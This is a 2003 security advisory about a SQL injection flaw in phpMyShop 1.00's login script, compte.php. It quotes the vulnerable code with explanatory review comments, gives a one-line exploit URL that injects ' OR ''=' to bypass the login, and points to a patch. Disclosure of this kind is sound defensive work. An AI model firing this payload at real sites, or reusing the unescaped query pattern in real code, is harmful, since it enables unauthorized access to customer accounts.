3rd Feb 2003 [SBWID-5963]
COMMAND
	phpMyShop SQL Injection
SYSTEMS AFFECTED
	phpMyShop 1.00
PROBLEM
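	Frog Man [[email protected]] found that compte.php builds its login query from the identifiant and password request values without escaping them :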
	 PHP Code/Location :
	 °°°°°°°°°°°°°°°°°°°
	
	compte.php :
	---------------------------------------------------------------
	<?
	// Excerpt of compte.php as quoted in the advisory: the customer login step of the shop.
	// None of $achat, $valider, $identifiant or $password is assigned in this excerpt;
	// the request shown in the advisory supplies them as query parameters, so the script
	// presumably relies on register_globals to turn request parameters into globals.
	session_start();
	if (isset($achat))
	{
	session_register("achat");
	}
	else
	{
	// NOTE(review): no exit follows this redirect, so the includes and the login
	// code below still run when $achat is missing.
	header("location:index.php");
	}
	include("design/header.php");
	require("config.php");
	require("fonction.php");
	// $barre1 is not set in this excerpt; presumably it comes from one of the files included above.
	echo"<td bgcolor=\"$barre1\"><strong>Identification</strong></td>
	  </tr>
	  <tr>
	    <td><br>";
	// Vulnerable statement: $identifiant and $password are interpolated between single
	// quotes with no escaping or validation visible in this excerpt, so a quote character
	// in either value changes the WHERE clause instead of being matched as data.
	// (Where PHP's magic_quotes_gpc setting is enabled it adds backslashes to request
	// values first; the code itself does nothing.)
	// Remediation: escape both values for the MySQL connection, or use a prepared
	// statement with bound parameters, before the query is built.
	// NOTE(review): pass_cli is compared with the submitted value as-is, which suggests
	// passwords are stored unhashed - confirm against the schema.
	if (isset($valider)) { $sql  =  "SELECT  id_cli,login_cli,pass_cli  FROM
	$table_client where login_cli='$identifiant' and  pass_cli='$password'";
	// The login is accepted whenever the row count is not "0"; id_cli of the first
	// returned row is then registered in the session as $id_membre and the browser is
	// sent to valide.php by client-side script. Otherwise the "Identifiant ou mot de
	// passe non valide!" message is shown both as a script alert and as page text.
	$sql =  mysql_db_query($base,$sql);  $test  =  mysql_num_rows($sql);  if
	($test=="0") { ?> <script  language="javascript">  alert("Identifiant
	ou    mot    de    passe    non    valide!");     </script>     <?
	echo"<center><strong>Identifiant   ou    mot    de    passe    non
	valide!</strong></center><br>";   }   else   {   $id_membre   =
	mysql_result($sql,0,"id_cli");     session_register("id_membre");     ?>
	<script  language="javascript">   document.location.href="valide.php"
	</script> <? } }
	[...] ---------------------------------------------------------------
	
	 Exploit :
	 °°°°°°°°°
	
	 http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='
	
SOLUTION
	Check, http://www.pc-encheres.com
	-Also-
	A patch has been published on http://www.phpsecure.info .
	 More details :
	 °°°°°°°°°°°°°°
	
	http://www.frog-man.org/tutos/phpmyshop.txt